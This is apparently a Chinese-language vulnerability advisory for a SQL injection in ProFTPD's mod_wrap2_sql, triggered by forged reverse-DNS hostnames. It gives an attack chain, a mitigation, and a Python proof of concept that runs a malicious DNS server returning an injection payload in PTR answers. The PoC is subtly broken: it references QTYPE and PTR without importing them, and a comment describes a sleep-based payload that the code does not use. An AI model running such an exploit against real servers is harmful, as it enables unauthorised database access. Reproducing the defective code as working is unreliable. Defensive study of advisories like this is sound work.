CVE-2026-44331 ProFTPD SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-44331

漏洞类型

SQL注入

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ProFTPD

漏洞概述

ProFTPD在特定版本之前存在SQL注入漏洞。该漏洞位于contrib/mod_wrap2_sql.c文件的sqltab_fetch_clients_cb()函数中。当服务器启用了UseReverseDNS选项时，攻击者可以通过控制反向DNS查找的结果（即伪造的域名），向SQL查询中注入任意恶意命令。由于程序在处理攻击者提供的主机名时未进行适当的转义，导致攻击者无需认证即可利用此漏洞，可能造成数据泄露、数据篡改或服务拒绝等严重后果。

技术细节

该漏洞的核心原因在于ProFTPD的mod_wrap2_sql模块在处理反向DNS解析结果时存在输入验证缺失。具体而言，当配置项UseReverseDNS被设置为on时，服务器会尝试解析连接客户端的IP地址对应的域名。随后，这个域名被直接传递给sqltab_fetch_clients_cb()函数用于构建SQL查询，而未经过任何过滤或转义处理。由于攻击者可以控制反向DNS记录（通过控制恶意域名的DNS服务器），他们能够构造包含特殊SQL字符（如单引号、注释符等）的域名。当ProFTPD使用此域名查询数据库（例如检查访问控制列表）时，恶意注入的SQL代码将被数据库服务器执行。虽然DNS名称的字符限制可能对利用造成一定约束，但通过精心构造Payload，攻击者仍可执行盲注或联合查询攻击，从而绕过认证或提取敏感数据。

攻击链分析

STEP 1

步骤1

攻击者搭建一个恶意的DNS服务器，配置用于解析特定IP地址的PTR记录。

STEP 2

步骤2

攻击者从其控制的恶意DNS服务器对应的IP地址发起对目标ProFTPD服务器的连接请求。

STEP 3

步骤3

目标ProFTPD服务器配置了UseReverseDNS on，因此对连接IP进行反向DNS查询。

STEP 4

步骤4

攻击者的恶意DNS服务器返回一个包含SQL注入Payload的伪造主机名（例如：' OR '1'='1）。

STEP 5

步骤5

ProFTPD的mod_wrap2_sql模块接收该主机名，并直接将其拼接到SQL查询语句中传递给数据库。

STEP 6

步骤6

数据库执行被注入的恶意SQL命令，攻击者成功利用漏洞获取数据库权限或敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct
from dnslib import DNSRecord, DNSHeader, DNSQuestion, RR, A

class MaliciousDNSServer:
    def __init__(self, ip, domain, payload):
        self.ip = ip
        self.domain = domain
        self.payload = payload

    def start(self):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.bind(('0.0.0.0', 53))
        print(f"[*] Listening on 53 UDP, serving malicious PTR for {self.ip}")

        while True:
            data, addr = sock.recvfrom(1024)
            try:
                request = DNSRecord.parse(data)
                response = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
                
                # Check if it's a PTR request (Reverse DNS)
                if request.q.qtype == 12: 
                    # Inject SQL payload into the hostname
                    malicious_hostname = f"'{self.payload}'"
                    print(f"[+] Sending malicious PTR: {malicious_hostname} to {addr}")
                    
                    # Construct PTR response
                    response.add_answer(RR(request.q.qname, getattr(QTYPE, 'PTR'), rdata=PTR(malicious_hostname)))
                
                sock.sendto(response.pack(), addr)
            except Exception as e:
                print(e)

if __name__ == "__main__":
    # Example usage: inject a simple sleep-based blind SQL payload
    # Note: Real payload depends on the backend SQL structure of mod_wrap2_sql
    PAYLOAD = " OR 1=1--"
    server = MaliciousDNSServer("1.2.3.4", "example.com", PAYLOAD)
    server.start()

影响范围

ProFTPD <= 1.3.9a (commit < 7666224)

防御指南

临时缓解措施

建议用户暂时在配置文件中将UseReverseDNS选项设置为off，以防止服务器利用未经过滤的DNS反向解析结果构建SQL查询。同时，应检查防火墙规则，确保FTP服务仅对必要的内部网络开放，减少攻击面。